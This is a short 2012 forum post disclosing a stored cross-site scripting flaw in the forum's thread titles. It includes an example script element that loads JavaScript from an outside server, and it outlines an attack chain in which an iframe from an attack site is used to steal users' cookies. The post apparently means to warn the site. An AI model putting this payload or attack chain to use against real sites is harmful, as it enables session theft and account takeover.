Thread created on Fri Oct 12, 2012 12:41:26 Last replied to on Mon Oct 15, 2012 01:47:47
Basically when you FIRST create a thread the title is injectable.
The title doesn't give you much space but you can easily embed a script element going to an external server.
Example: <script src=http://plornt.com/j.js>
(Add the html tags yourself to the script element above)
I know this is rather obvious but it can also be hidden in the fact that I could post it to one of those 'hidden'(non-existant) forums if they still exist and then include an iframe to that forum page via a attack site and then direct you there. After that I could steal your cookies! But yeah I personally would never do that ;D and Im fairly sure no one else would but its always better to be safe than sorry.